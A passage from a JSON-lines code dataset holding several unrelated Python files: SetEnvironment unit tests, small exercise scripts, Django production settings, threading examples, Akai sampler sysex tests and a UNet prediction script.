print(\"OK\")\n return 0\n\n def test_SetEnvironment_handler_envvar_remove_substr(self):\n \"\"\"\n Test the ``envvar_remove_substr`` handler.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_REMOVE_SUBSTR_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n parser.pretty_print_envvars(envvar_filter=[\"FOO\"], filtered_keys_only=True)\n\n envvar_foo_expect = \"BB\"\n envvar_foo_actual = os.environ[\"FOO\"]\n\n self.assertEqual(envvar_foo_expect, envvar_foo_actual)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_remove_substr_envvar_missing(self):\n \"\"\"\n Test the ``envvar_remove_substr`` handler when the envvar is missing / unset.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n section = \"ENVVAR_REMOVE_SUBSTR_TEST_NO_ENVVAR\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n parser.pretty_print_envvars(envvar_filter=[\"FOO\"], filtered_keys_only=True)\n\n self.assertTrue(\"FOO\" not in os.environ.keys())\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_remove_path_entry(self):\n \"\"\"\n Test the ``envvar_remove_path_entry`` handler.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n section = \"ENVVAR_REMOVE_PATH_ENTRY_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n parser.apply(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n parser.pretty_print_envvars(envvar_filter=[\"TEST_PATH1\"], filtered_keys_only=True)\n envvar_expect = os.pathsep.join([\"/foo\", \"/bar/baz\", \"/bif\"])\n envvar_actual = os.environ[\"TEST_PATH1\"]\n self.assertEqual(envvar_expect, envvar_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n parser.pretty_print_envvars(envvar_filter=[\"TEST_PATH2\"], filtered_keys_only=True)\n envvar_expect = os.pathsep.join([\"/foo\", \"/bar\", \"/bar/baz\", \"/bar\", \"/bif\"])\n envvar_actual = os.environ[\"TEST_PATH2\"]\n self.assertEqual(envvar_expect, envvar_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n parser.pretty_print_envvars(envvar_filter=[\"TEST_PATH3\"], filtered_keys_only=True)\n envvar_expect = os.pathsep.join([\"/foo\", \"/bar\", \"/bar\", \"/bif\"])\n envvar_actual = os.environ[\"TEST_PATH3\"]\n self.assertEqual(envvar_expect, envvar_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_assert_not_empty_01(self):\n \"\"\"Test the ``envvar-assert-not-empty`` command's functions.\n \"\"\"\n # Toggle generate-new-ground-truth-files mode. This should never be left True when checked in.\n gen_new_ground_truth = global_gen_new_ground_truth_files\n # ATTN: LEAVING THIS ENABLED SHOULD FAIL THIS TEST AFTER FILE GENERATION\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n section = \"ENVVAR_ASSERT_NOT_EMPTY\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n with self.assertRaises(ValueError):\n parser.apply(section)\n # Todo: is there a way to determine tne # of calls to the assert?\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n script_bash_actual = parser.generate_actions_script(section, interp='bash')\n print(script_bash_actual)\n\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_01\" \"\"\\n', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_02\" \"\"\\n', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_03\" \"ERROR -', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_04\" \"\"\\n', script_bash_actual)\n self.assertIn('envvar_op assert_not_empty \"TEST_ENVVAR_VALUE_05\" \"ERROR -', script_bash_actual)\n\n options = {\n \"prefix\": \"ane\",\n \"section\": section,\n \"header\": True,\n \"body\": True,\n \"shebang\": True,\n \"interpreter\": \"bash\"\n }\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n # Generate Python output\n script_python_actual = parser.generate_actions_script(section, interp='python')\n options[\"interpreter\"] = \"python\"\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n self.assertFalse(gen_new_ground_truth, \"Testing should not also generate new ground truth.\")\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_assert_not_empty_02(self):\n \"\"\"Test the ``envvar-assert-not-empty`` command's functions.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n section = \"ENVVAR_ASSERT_NOT_EMPTY_02\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n with self.assertRaises(ValueError):\n parser.apply(section)\n # Todo: is there a way to determine tne # of calls to the assert?\n\n print(\"-----[ TEST END ]------------------------------------------\")\n\n def test_SetEnvironment_write_actions_to_file(self):\n \"\"\"\n \"\"\"\n # Toggle generate-new-ground-truth-files mode. This should never be left True when checked in.\n gen_new_ground_truth = global_gen_new_ground_truth_files\n # ATTN: LEAVING THIS ENABLED SHOULD FAIL THIS TEST AFTER FILE GENERATION\n\n section = \"CONFIG_A+\"\n\n options_list = [\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": False,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"bash\",\n \"header\": False,\n \"body\": False,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": True,\n \"body\": False,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": True,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": True,\n \"shebang\": False\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": False,\n \"shebang\": True\n },\n {\n \"prefix\": \"config\",\n \"section\": section,\n \"interpreter\": \"python\",\n \"header\": False,\n \"body\": False,\n \"shebang\": False\n },\n ]\n\n for options in options_list:\n self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n\n self.assertFalse(gen_new_ground_truth, \"Testing should not also generate new ground truth.\")\n\n return\n\n def test_SetEnvironment_bash_env_val_with_special_chars_not_interpreted(self):\n \"\"\"\n This test is to ensure that values for an envvar_op that have\n special characters such as ; or * are not interpreted when envvar_op is\n called. Rather, they should be passed by value to this function.\n \"\"\"\n gen_new_ground_truth = global_gen_new_ground_truth_files\n options = {\n \"prefix\": \"special_chars\",\n \"section\": \"BASH_ENV_VAL_WITH_SPECIAL_CHARS_NOT_INTERPRETED\",\n \"interpreter\": \"bash\",\n \"header\": True,\n \"body\": True,\n \"shebang\": True\n }\n filename = self._helper_write_actions_to_file(options, gen_new_ground_truth=gen_new_ground_truth)\n p = subprocess.run(f\"source {filename}\", shell=True,\n stdout=subprocess.PIPE,stderr=subprocess.PIPE, universal_newlines=True)\n self.assertFalse(\"command not found\" in p.stderr)\n self.assertFalse(\"command not found\" in p.stdout)\n\n def test_SetEnvironment_write_actions_to_file_bad_interp(self):\n \"\"\"\n \"\"\"\n section = \"CONFIG_A+\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 5\n parser.exception_control_compact_warnings = True\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Raise exception on bad interpreter\")\n parser.exception_control_level = 5\n with self.assertRaises(ValueError):\n parser.write_actions_to_file(\"___tmp.txt\", section, interpreter=\"not a valid interpreter\")\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Warning on bad interpreter\")\n parser.exception_control_level = 2\n rval_expect = 1\n rval_actual = parser.write_actions_to_file(\n \"___tmp.txt\", section, interpreter=\"not a valid interpreter\"\n )\n self.assertEqual(rval_expect, rval_actual)\n print(\"-----[ TEST END ]------------------------------------------\")\n\n return\n\n def test_SetEnvironment_freefunc_envvar_assign(self):\n \"\"\"\n Test the free-function ``envvar_assign``\n \"\"\"\n print(\"\\n\")\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n with self.assertRaises(TypeError):\n envvar_set(None, \"BAR\")\n\n with self.assertRaises(TypeError):\n envvar_set(\"FOO\", None)\n\n with self.assertRaises(TypeError):\n envvar_set(\"FOO\", \"BAR\", None)\n\n envvar_set(\"FOO\", \"\", True)\n self.assertEqual(\"\", os.environ[\"FOO\"])\n del os.environ[\"FOO\"]\n\n with self.assertRaises(ValueError):\n envvar_set(\"FOO\", \"\", False)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_freefunc_envvar_op(self):\n \"\"\"\n Test the free-function ``envvar_op``\n \"\"\"\n print(\"\\n\")\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n with self.assertRaises(ValueError):\n envvar_op(\"non-existent-operation\", \"FOO\")\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_handler_envvar_find_in_path(self):\n \"\"\"\n Test ``envvar_find_in_path``\n\n This test doesn't really validate any output -- it just runs a basic check.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 0\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of an application that is FOUND in the PATH.\")\n section = \"ENVVAR_FIND_IN_PATH_TEST\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"\")\n parser.apply(section)\n\n envvar_name = \"TEST_ENVVAR_PATH\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\"ls\" in os.environ[envvar_name], \"ls not found in path.\")\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of an application that is NOT FOUND in the PATH.\")\n envvar_name = \"TEST_ENVVAR_NOTFOUND\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\n os.environ[envvar_name] == \"\",\n \"Missing executable {} expected an empty-envvar\".format(envvar_name)\n )\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of app that IS IN PATH:\")\n print(\"- distutils.spawn.find_executable fails\")\n print(\"- shutil.which succeeds\")\n with patch(\n 'distutils.spawn.find_executable', side_effect=mock_distutils_spawn_find_executable_NotFound\n ):\n parser.apply(section)\n\n envvar_name = \"TEST_ENVVAR_PATH\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\"ls\" in os.environ[envvar_name], \"ls not found in path.\")\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"Test location of app that IS NOT IN PATH:\")\n print(\"- distutils.spawn.find_executable fails\")\n print(\"- shutil.which fails\")\n with patch(\n 'distutils.spawn.find_executable', side_effect=mock_distutils_spawn_find_executable_NotFound\n ):\n parser.apply(section)\n\n envvar_name = \"TEST_ENVVAR_NOTFOUND\"\n self.assertTrue(envvar_name in os.environ.keys(), \"Missing expected envvar: {}\".format(envvar_name))\n self.assertTrue(\n os.environ[envvar_name] == \"\",\n \"Missing executable {} expected an empty-envvar\".format(envvar_name)\n )\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n @patch('subprocess.run', side_effect=mock_run_status_ok)\n def test_SetEnvironment_module_load_default(self, arg_run):\n \"\"\"\n Tests loading a *default* module via ``module-load``, for\n example ``module-load gcc`` instead of ``module-load gcc : 7.3.0``.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"MODULE_LOAD_NO_VERSION\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data_expect_subset_01 = {'op': 'module_load', 'module': 'gcc', 'value': None}\n data_expect_subset_02 = {'op': 'module_load', 'module': 'boost', 'value': ''}\n\n data_actual = parser.parse_section(section)\n\n self.assertDictEqual(data_actual['setenvironment'][2], parser.actions[section][2])\n self.assertDictEqual(data_actual['setenvironment'][3], parser.actions[section][3])\n\n self.assertDictEqual(data_actual['setenvironment'][2], data_expect_subset_01)\n self.assertDictEqual(data_actual['setenvironment'][3], data_expect_subset_02)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"\")\n parser.apply(section)\n\n parser.pretty_print_envvars(envvar_filter=[\"TEST_SETENVIRONMENT_\"], filtered_keys_only=True)\n\n self.assertEqual(\"7.3.0\", os.environ[\"TEST_SETENVIRONMENT_GCC_VER\"])\n print(\"-----[ TEST END ]------------------------------------------\")\n\n print(\"OK\")\n return\n\n # =================\n # H E L P E R S\n # =================\n\n def _helper_parse_section(self, section, actions_expect, rval_expect_cped):\n \"\"\"\n Generic helper routine to test various ways of parsing a section\n with verification that the results we get are expected.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment()\n parser.inifilepath = self._filename\n parser.debug_level = 5\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n\n ## parse section via configparserenhanceddata accessor\n print(\"Parse using configparserenhanceddata[{}]:\".format(section))\n rval_actual_cped = parser.configparserenhanceddata[section]\n parser.pretty_print_actions(section)\n actions_actual_cped = parser.actions[section]\n\n self.assertDictEqual(rval_expect_cped, rval_actual_cped)\n\n # Reset parser and parse section via parse_section\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n # Parse the section using `parse_section()`\n print(\"Parse using parse_section({}):\".format(section))\n rval_expect = {\"setenvironment\": actions_expect}\n rval_actual = parser.parse_section(section)\n actions_actual_ps = parser.actions[section]\n\n self.assertDictEqual(rval_expect, rval_actual)\n\n # Check results\n\n self.assertListEqual(actions_actual_cped, actions_actual_ps, \"Mismatch in result across methods.\")\n\n self.assertListEqual(\n actions_expect, actions_actual_cped, \"configparserenhanceddata[] results validation failed.\"\n )\n\n self.assertListEqual(actions_expect, actions_actual_ps, \"parse_section() results validation failed.\")\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def _helper_write_actions_to_file(self, options, gen_new_ground_truth=False):\n \"\"\"\n Set gen_new_ground_truth = True to create new ground-truth files.\n \"\"\"\n\n print(\"\\n\")\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n print(\"options : {}\".format(options))\n print(\"Load file: {}\".format(self._filename))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n\n files_subdir = \"files\"\n\n filename_prefix = options[\"prefix\"]\n filename_interp = options[\"interpreter\"]\n filename_header = options[\"header\"]\n filename_body = options[\"body\"]\n filename_shebang = options[\"shebang\"]\n\n section = options[\"section\"]\n print(\"Section : {}\".format(section))\n\n filename_base = filename_prefix\n filename_ext = \"txt\"\n\n self.assertIn(filename_interp, [\"bash\", \"python\"])\n\n if filename_interp == \"bash\":\n filename_ext = \"sh\"\n elif filename_interp == \"python\":\n filename_ext = \"py\"\n\n filename_base += \"-{}\".format(filename_interp)\n\n if filename_header:\n filename_base += \"-inc_hdr\"\n else:\n filename_base += \"-exc_hdr\"\n\n if filename_body:\n filename_base += \"-inc_body\"\n else:\n filename_base += \"-exc_body\"\n\n if filename_shebang:\n filename_base += \"-inc_shbng\"\n else:\n filename_base += \"-exc_shbng\"\n\n filename_base += \".{}\".format(filename_ext)\n\n filename_base_truth = \"_\" + filename_base\n filename_base_test = \"___\" + filename_base\n\n # parse a section\n parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n filename_out_truth = os.path.sep.join([self.unit_test_path, files_subdir, filename_base_truth])\n filename_out_test = os.path.sep.join([self.unit_test_path, files_subdir, filename_base_test])\n\n rval_expect = 0\n rval_actual = parser.write_actions_to_file(\n filename_out_test,\n section,\n include_header=filename_header,\n include_body=filename_body,\n include_shebang=filename_shebang,\n interpreter=filename_interp\n )\n\n if gen_new_ground_truth:\n rval_actual = parser.write_actions_to_file(\n filename_out_truth,\n section,\n include_header=filename_header,\n include_body=filename_body,\n include_shebang=filename_shebang,\n interpreter=filename_interp\n )\n\n self.assertEqual(rval_expect, rval_actual)\n self.assertTrue(filecmp.cmp(filename_out_truth, filename_out_test))\n\n print(\"-----[ TEST END ]------------------------------------------\")\n return filename_out_test\n\n\n\n# EOF\n","repo_name":"sandialabs/ConfigParserEnhanced","sub_path":"wip/setenvironment/src/setenvironment/unittests/test_SetEnvironment.py","file_name":"test_SetEnvironment.py","file_ext":"py","file_size_in_byte":73423,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"74701727488","text":"n = int(input()) # How many students\r\nstudent_marks = {} #Dictonary to save the name and marks\r\nfor _ in range(n): #for iteration of taking inputs\r\n name, *line = input().split() #Splitting inputs in name and marks\r\n scores = list(map(float, line)) #scores are the float ones\r\n scores = sum(scores) / 3 #finding average\r\n student_marks[name] = scores #here name is the key to values of score\r\nquery_name = input() #Taking name for whose average you want to see\r\nprint('%.2f' % student_marks[query_name]) #%.2f tells that only go 2 decimals after the integer part\r\n#% student_marks[query_name] will give you the marks of entered query name (last marks that gets printed)\r\n","repo_name":"kvraiden/Simple-Python-Projects","sub_path":"percentage.py","file_name":"percentage.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74606468289","text":"from abc import ABC, abstractmethod\nimport json\nimport xml.etree.ElementTree as ET\nimport os\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass Strategy(ABC):\n @abstractmethod\n def open_file(self, file):\n pass\n\n def analyze_data(self, data: dict) -> str:\n result = ''\n for key, value in data['package'].items():\n result += f'{key} - {value}\\n'\n return result\n\n\nclass TxtStrategy(Strategy):\n def open_file(self, file) -> dict:\n data = {'package': {}}\n with open(file, 'r') as opened_file:\n for line in opened_file.readlines()[1:]:\n key, value = line.split(':')\n data['package'].update({key: value.strip()})\n data['package'].update({'origin': 'txt'})\n return data\n\n\nclass JsonStrategy(Strategy):\n def open_file(self, file) -> dict:\n with open(file, 'r') as opened_file:\n data = json.load(opened_file)\n data['package'].update({'origin': 'json'})\n return data\n\n\nclass XmlStrategy(Strategy):\n def open_file(self, file) -> dict:\n tree = ET.parse(file)\n root = tree.getroot()\n data = {'package': {}}\n for tag in list(root.iter())[1:]:\n data['package'].update({tag.tag: tag.text})\n data['package'].update({'origin': 'xml'})\n return data\n\n\nclass Context:\n def __init__(self, strategy: Strategy):\n self._strategy = strategy\n\n @property\n def strategy(self) -> Strategy:\n return self._strategy\n\n @strategy.setter\n def strategy(self, value: Strategy):\n self._strategy = value\n\n def get_data(self, file) -> str:\n raw_data = self._strategy.open_file(file)\n data = self._strategy.analyze_data(raw_data)\n return data\n\n\nif __name__ == '__main__':\n while True:\n file_type = input('Choose file type: ')\n if file_type == 'json':\n file_name = 'data.json'\n strategy = JsonStrategy()\n elif file_type == 'txt':\n file_name = 'data.txt'\n strategy = TxtStrategy()\n elif file_type == 'xml':\n file_name = 'data.xml'\n strategy = XmlStrategy()\n else:\n continue\n file_path = os.path.join(BASE_DIR, file_name)\n context = Context(strategy)\n print(context.get_data(file_path))\n","repo_name":"Chenger1/patterns","sub_path":"patterns/behaviour/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43797410881","text":"from .settings import *\nfrom .env_settings import SECRET_KEY\n\nDEBUG = False\n\nSTATIC_ROOT = '/code/static/'\n\nALLOWED_HOSTS = [\n 'delorean.fdesousa.fr'\n]\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'OPTIONS': {\n 'read_default_file': os.path.join(BASE_DIR, 'db.cnf'),\n 'init_command': 'SET default_storage_engine=INNODB'\n },\n }\n}\n\nINSTALLED_APPS.append('mod_wsgi.server')\n\nCORS_ORIGIN_ALLOW_ALL = False\n\nCORS_ORIGIN_WHITELIST = [\n 'alignment.fdesousa.fr' # Allow only the React frontend to send graphQL queries\n]\n","repo_name":"PhilippeFerreiraDeSousa/bitext-matching","sub_path":"back/bitext_matching/settings_prod.py","file_name":"settings_prod.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70099112131","text":"import threading\nimport time\n\n'''\nImplemented a bounded hash set with fixed size.\nAPIs:\n add(val)\n remove(val)\nDS:\n'''\nclass BHS_Semaphore:\n def __init__(self, capacity):\n self.hs = set() # hashset\n self.sem = threading.Semaphore(capacity)\n self.m = threading.RLock()\n\n def add(self, val):\n self.sem.acquire() \n self.m.acquire()\n if val in self.hs:\n self.sem.release() \n else:\n self.hs.add(val)\n\n self.m.release()\n\n def remove(self, val):\n self.m.acquire()\n if val in self.hs:\n self.hs.remove(val)\n self.sem.release()\n self.m.release()\n\n\nclass BHS_CV:\n def __init__(capacity):\n self.hs = set() # hashset\n self.m = threading.mutex()\n self.cv_full = threading.Condition(self.m)\n self.cv_empty = threading.Condition(self.m)\n\n def add(val):\n self.m.acquire()\n while len(self.hs) >= self.capacity:\n print (\"can not produce wait..\", val)\n self.cv_full.wait()\n\n self.hs.add(val)\n\n self.cv_empty.notify()\n self.m.release()\n\n def remove(val):\n self.m.acquire()\n while len(self.hs) == 0:\n cv_empty.wait()\n\n self.hs.remove(val)\n\n self.cv_full.notify()\n self.m.release()\n\ndef producer(bhs):\n while True:\n for val in [1,2,3,4,4,5,5,6,7,8,9,10]:\n bhs.add(val)\n print (\"producer\", bhs.hs)\n\ndef consumer(bhs):\n while True:\n for val in [1,2,3,4,4,5,5,6,7,8,9,10]:\n bhs.remove(val)\n print (\"consumer\", bhs.hs)\n time.sleep(1)\n\nbhs = BHS_Semaphore(5)\nthread1 = threading.Thread(target=producer, args=(bhs,))\nthread2 = threading.Thread(target=consumer, args=(bhs,))\n\nthread1.start()\nthread2.start()\n\nthread1.join()\nthread2.join()\n\nprint (\"DONE\")\n","repo_name":"chandankmishra/lang","sub_path":"python/concurrency/q_bounded_hash_set/bounded_hash_set.py","file_name":"bounded_hash_set.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8176562684","text":"import struct, sys, unittest, logging, os\n\nfrom aksy.devices.akai import sysex, sysex_types, sampler, connector\nfrom aksy.devices.akai.z48 import sampler\n\nlog = logging.getLogger(\"aksy\")\nconn = connector.USBConnector('z48')\nz48 = sampler.Z48(conn)\n\nclass TestUserRef(unittest.TestCase):\n def testEncodeDecode(self):\n cmd = sysex.Command(sysex.Z48_ID, '\\x20\\x04', 'get_no_disks', (), (sysex_types.TYPEBYTE, sysex_types.BYTE,),\n userref_type=sysex_types.USERREF)\n request = sysex.Request(cmd, (), 0)\n bytes = z48._execute(request.get_bytes())\n length, request_id = sysex_types.USERREF.decode(bytes[3:])\n\n self.assertEquals(0, request_id)\n\n cmd = sysex.Command(sysex.S56K_ID, '\\x10\\x04', 'get_no_disks', (), (sysex_types.BYTE,),\n userref_type=sysex_types.S56K_USERREF)\n request = sysex.Request(cmd, (), 16000)\n\n bytes = z48._execute(request.get_bytes())\n length, request_id = sysex_types.USERREF.decode(bytes[3:])\n\n self.assertEquals(3, length)\n self.assertEquals(16000, request_id)\n\n cmd = sysex.Command(sysex.Z48_ID, '\\x20\\x04', 'get_no_disks', (), (sysex_types.TYPEBYTE, sysex_types.BYTE,),\n userref_type=sysex_types.Z48USERREF)\n\n request = sysex.Request(cmd, (), 126)\n bytes = z48._execute(request.get_bytes())\n result = sysex.Reply(bytes, cmd)\n request_id = result.get_request_id()\n self.assertEquals(126, request_id)\n\n request = sysex.Request(cmd, (), 16000)\n bytes = z48._execute(request.get_bytes())\n result = sysex.Reply(bytes, cmd)\n request_id = result.get_request_id()\n self.assertEquals(16000, request_id)\n\ndef test_suite():\n testloader = unittest.TestLoader()\n return testloader.loadTestsFromName('tests.aksy.devices.akai.z48.ftests.test_sysex')\n","repo_name":"watzo/aksy","sub_path":"src/tests/aksy/devices/akai/z48/ftests/test_sysex.py","file_name":"test_sysex.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"43"} +{"seq_id":"40546319830","text":"import torch\nimport numpy as np\n\nfrom PIL import Image\n\nimg_size = (256, 256)\nunet = torch.load('./weights/unet_epoch_51.pth')\n\nunet.eval()\n\n\nim = np.asarray(Image.open('data/JPEGImages/6.jpg').resize(img_size))\n\nim = im / 255.\nim = im.transpose(2, 0, 1)\nim = im[np.newaxis, :, :]\nim = im.astype('float32')\noutput = unet(torch.from_numpy(im)).detach().numpy()\n\noutput = np.squeeze(output)\noutput = np.where(output>0.5, 150, 0).astype(np.uint8)\nprint(output.shape, type(output))\nim = Image.fromarray(output)\nim.save('output.jpg')\n","repo_name":"syuu1987/geekTime-semantic-segmentation","sub_path":"predict_single.py","file_name":"predict_single.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"16272636857","text":"import pandas as pd\nfrom helpers import settings\nimport re\n\nclass Samples:\n '''\n Loads sample entries from CSV file into a pandas dataframe.\n Columns:\n domain = medicine\n heading = MEDICAL JURISPRUDENCE\n path = eb07/XML/m14/kp-eb0714-049001-6192-v1.xml\n '''\n\n def load(self):\n self.df = None\n path = settings.SAMPLES_PATH\n if path.exists():\n self.df 